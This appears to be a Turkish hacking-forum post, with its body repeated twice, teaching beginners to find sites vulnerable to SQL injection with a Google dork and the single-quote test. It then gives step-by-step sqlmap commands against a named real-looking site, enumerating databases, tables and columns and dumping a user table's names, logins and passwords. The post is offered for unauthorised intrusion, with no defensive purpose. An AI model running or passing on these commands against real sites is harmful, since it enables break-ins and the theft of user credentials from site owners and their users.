- 29 Tem 2017
- 85
- 1
Evet arkadaşlar bugün siteye sızma veritabanı çekme nasıl yapılır?
Bunları sizlerle paylaşacağım forumda çoğu kişi bunu bilir,ama
yeniler için birebir olacaktır.
SQLi Database Nedir?
SQLi: verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir.
Database: bir sitenin veritabanıdır,bilgilerin kayıtların tutulduğu yerdir.
##ŞİMDİ BU VERİTABANINA NASIL GİRECEZ DİYECEKSİNİZ##
Hemen başlayalım..
Bu işin iki yolu var.
Birincisi Windowsta ;
*Havij
*Safe3 programıyla (Acunetix önerende var)
İkincisi Linux [Sanal Makine] ;
*Sqlmap
*Admin panel
Evet bunları tanıttık ;
#İkinci Yolu göstercem size
Şimdi sanal makinemizi açalım.
Terminalimize sqlmap --help komutunu girerek,neler yapabileceğimiz bize
listenleniyor.
sqlmap -g "dorkumuz"
Örneğin; sqlmap -g "inurl:index.php?id="
Not:
y evet n hayır q çıkış demektir.
bu siteye inject olmak istiyorsanız Y
başka site isterseniz N
Bu dorku google yapıştırsanız gene aynı sonucu alırsınız.
Sıra geldi sitemize sızmak veritabanına inmek için açık.
Bu en basiti arkadaşlar sitelerimize tıklıyoruz.Açık olduğunu anlamak için
sitenin sonuna tek ' yazıp enterlıyoruz.
Sitenin sonuna tırnak koyup enterladığımda bana bu site yukarda hata yazısı
verdi,kısaca açık olduğunu anlatmak istedi peki şimdi napıyoruz.
Terminalimize su komutları giriyoruz.
sqlmap -u "www.hedefsite.com/index.php?id='" --dbs
-u url
--dbs veritabanı
sitenin sonuna tek tırnağı unutmayın '
Örneğin ;
sqlmap -u "http://cecit.es/news.php?id=99'" --dbs
Karşımıza gelenlere Y dedik ve bu geldi napcaz??
Burası artık sitenin veritabanı arkadaşlar.Şimdi tabloları ve bilgileri
cekecez.(e-mail,phone,şifreler vs.)
Öncelikle tablomuzu seçelim.
Buraya dikkat.
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit --tables
--tables yani tabloları aç veritabanın içindeki klasör gibi düşünün.
Tablolarımızı bulduk.Şimdi dökümanlara(Kolon) girelim neler varmış.
Hepsini dikkatlice yaparsanız mantıkgı kavrarsınız.
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur --columns
Gördüğünüz gibi şifre,profil,nom o ne bilmiyorum xd,giriş.
Şimdi bunlar ne işime yarıyacak nasıl öğrencem felan filan cok basit arkadaşlar
--dump etmek veri çekmek diğer adı
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur -C nom,login,password --dump
ve mutlu son.Arkadaşlar sqli injection bundan ibaret bazen şifreler olmayabilir,en son güncel girilen kayıtlar bunlar çoğunluk doğru çıkar.Zaten böyle sitelere Bypass
yiyor.Benim görevim bu kadar.
Yakında daha detaylı inceleyeceğiz.
İyi Forumlar.
Bunları sizlerle paylaşacağım forumda çoğu kişi bunu bilir,ama
yeniler için birebir olacaktır.
SQLi Database Nedir?
SQLi: verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir.
Database: bir sitenin veritabanıdır,bilgilerin kayıtların tutulduğu yerdir.
##ŞİMDİ BU VERİTABANINA NASIL GİRECEZ DİYECEKSİNİZ##
Hemen başlayalım..
Bu işin iki yolu var.
Birincisi Windowsta ;
*Havij
*Safe3 programıyla (Acunetix önerende var)
İkincisi Linux [Sanal Makine] ;
*Sqlmap
*Admin panel
Evet bunları tanıttık ;
#İkinci Yolu göstercem size
Şimdi sanal makinemizi açalım.
Terminalimize sqlmap --help komutunu girerek,neler yapabileceğimiz bize
listenleniyor.
sqlmap -g "dorkumuz"
Örneğin; sqlmap -g "inurl:index.php?id="
Not:
y evet n hayır q çıkış demektir.
bu siteye inject olmak istiyorsanız Y
başka site isterseniz N
Bu dorku google yapıştırsanız gene aynı sonucu alırsınız.
Sıra geldi sitemize sızmak veritabanına inmek için açık.
Bu en basiti arkadaşlar sitelerimize tıklıyoruz.Açık olduğunu anlamak için
sitenin sonuna tek ' yazıp enterlıyoruz.
Sitenin sonuna tırnak koyup enterladığımda bana bu site yukarda hata yazısı
verdi,kısaca açık olduğunu anlatmak istedi peki şimdi napıyoruz.
Terminalimize su komutları giriyoruz.
sqlmap -u "www.hedefsite.com/index.php?id='" --dbs
-u url
--dbs veritabanı
sitenin sonuna tek tırnağı unutmayın '
Örneğin ;
sqlmap -u "http://cecit.es/news.php?id=99'" --dbs
Karşımıza gelenlere Y dedik ve bu geldi napcaz??
Burası artık sitenin veritabanı arkadaşlar.Şimdi tabloları ve bilgileri
cekecez.(e-mail,phone,şifreler vs.)
Öncelikle tablomuzu seçelim.
Buraya dikkat.
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit --tables
--tables yani tabloları aç veritabanın içindeki klasör gibi düşünün.
Tablolarımızı bulduk.Şimdi dökümanlara(Kolon) girelim neler varmış.
Hepsini dikkatlice yaparsanız mantıkgı kavrarsınız.
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur --columns
Gördüğünüz gibi şifre,profil,nom o ne bilmiyorum xd,giriş.
Şimdi bunlar ne işime yarıyacak nasıl öğrencem felan filan cok basit arkadaşlar
--dump etmek veri çekmek diğer adı
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur -C nom,login,password --dump
ve mutlu son.Arkadaşlar sqli injection bundan ibaret bazen şifreler olmayabilir,en son güncel girilen kayıtlar bunlar çoğunluk doğru çıkar.Zaten böyle sitelere Bypass
yiyor.Benim görevim bu kadar.
Yakında daha detaylı inceleyeceğiz.
İyi Forumlar.
Son düzenleme: